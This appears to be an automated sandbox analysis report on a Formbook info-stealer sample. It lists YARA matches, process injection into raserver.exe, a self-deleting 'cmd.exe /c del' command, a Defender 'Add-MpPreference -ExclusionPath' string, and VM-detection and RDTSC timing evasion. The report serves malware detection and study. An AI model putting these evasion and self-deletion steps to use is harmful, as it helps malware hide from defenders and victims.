            Source: 00000004.00000002.311261604.00000000011B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.311261604.00000000011B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.311590903.00000000011E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.311590903.00000000011E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.262152823.0000000003FD3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.262152823.0000000003FD3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.310331740.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.310331740.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000E.00000002.504377982.0000000000380000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000E.00000002.504377982.0000000000380000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000E.00000002.507153893.0000000000C80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000E.00000002.507153893.0000000000C80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.hvEop8Y70Y.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.2.hvEop8Y70Y.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.hvEop8Y70Y.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.2.hvEop8Y70Y.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: hvEop8Y70Y.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@12/7
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hvEop8Y70Y.exe.logJump to behavior
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeMutant created: \Sessions\1\BaseNamedObjects\TItEGneTqYuzerdV
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6828:120:WilError_01
            Source: hvEop8Y70Y.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmpBinary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
            Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
            Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
            Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmpBinary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
            Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
            Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
            Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
            Source: hvEop8Y70Y.exeVirustotal: Detection: 25%
            Source: hvEop8Y70Y.exeReversingLabs: Detection: 29%
            Source: unknownProcess created: C:\Users\user\Desktop\hvEop8Y70Y.exe 'C:\Users\user\Desktop\hvEop8Y70Y.exe'
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess created: C:\Users\user\Desktop\hvEop8Y70Y.exe C:\Users\user\Desktop\hvEop8Y70Y.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
            Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\hvEop8Y70Y.exe'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess created: C:\Users\user\Desktop\hvEop8Y70Y.exe C:\Users\user\Desktop\hvEop8Y70Y.exe
            Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\hvEop8Y70Y.exe'
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: hvEop8Y70Y.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: hvEop8Y70Y.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: wntdll.pdbUGP source: hvEop8Y70Y.exe, 00000004.00000002.312279182.00000000014B0000.00000040.00000001.sdmp, raserver.exe, 0000000E.00000002.509423103.000000000459F000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: hvEop8Y70Y.exe, raserver.exe
            Source: Binary string: RAServer.pdb source: hvEop8Y70Y.exe, 00000004.00000002.312209416.0000000001440000.00000040.00000001.sdmp
            Source: Binary string: RAServer.pdbGCTL source: hvEop8Y70Y.exe, 00000004.00000002.312209416.0000000001440000.00000040.00000001.sdmp
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 0_2_008BDC80 push 00000000h; iretd
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 0_2_008BD65F push es; retn 0001h
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 0_2_075D4B4C push esp; retf
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 0_2_075D6A3A pushad ; ret
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 0_2_075D39FB push ss; iretd
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_004152F5 push esi; retf
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0041536A push esi; retf
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0041B3F2 push eax; ret
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0041B3FB push eax; ret
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0041B3A5 push eax; ret
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0041B45C push eax; ret
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_009ADC4E push 00000000h; iretd
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_009AD65F push es; retn 0001h
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0152D0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044FD0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_003952F5 push esi; retf
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0039536A push esi; retf
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0039B3A5 push eax; ret
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0039B3FB push eax; ret
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0039B3F2 push eax; ret
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0039B45C push eax; ret
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0039BDAE push esp; iretd
            Source: initial sampleStatic PE information: section name: .text entropy: 7.60713416041
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM3Show sources
            Source: Yara matchFile source: 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: hvEop8Y70Y.exe PID: 6364, type: MEMORY
            Source: Yara matchFile source: 0.2.hvEop8Y70Y.exe.2f43d44.1.raw.unpack, type: UNPACKEDPE
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
            Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 00000000003885E4 second address: 00000000003885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 000000000038896E second address: 0000000000388974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_004088A0 rdtsc
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe TID: 6368Thread sleep time: -104479s >= -30000s
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe TID: 6428Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe TID: 6636Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exe TID: 1100Thread sleep time: -45000s >= -30000s
            Source: C:\Windows\SysWOW64\raserver.exe TID: 6636Thread sleep time: -44000s >= -30000s
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeThread delayed: delay time: 104479
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeThread delayed: delay time: 922337203685477
            Source: explorer.exe, 00000005.00000000.287635798.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
            Source: explorer.exe, 00000005.00000000.266107364.00000000011B3000.00000004.00000020.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000005.00000002.512951288.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000005.00000000.286652436.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: explorer.exe, 00000005.00000002.513145785.0000000003767000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
            Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
            Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
            Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmpBinary or memory string: VMWARE
            Source: explorer.exe, 00000005.00000002.506081202.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
            Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000005.00000000.287710700.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
            Source: explorer.exe, 00000005.00000000.279837989.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
            Source: explorer.exe, 00000005.00000000.286652436.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: explorer.exe, 00000005.00000000.286652436.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: explorer.exe, 00000005.00000000.287710700.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
            Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
            Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
            Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
            Source: explorer.exe, 00000005.00000000.286652436.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_004088A0 rdtsc
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_00409B10 LdrLoadDll,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014FB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014FB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014DC962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014DB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014DB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014D9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014D9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014D9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0150513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0150513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014F4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014F4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014F4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014F4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014F4120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014DB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014DB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014DB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015641E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01502990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014FC182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0150A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015551BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015551BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015551BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015551BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015061A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015061A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015569A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014F0050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014F0050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01592073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A1074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01557016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01557016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01557016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A4015 mov eax, dword ptr fs:[00000030h]
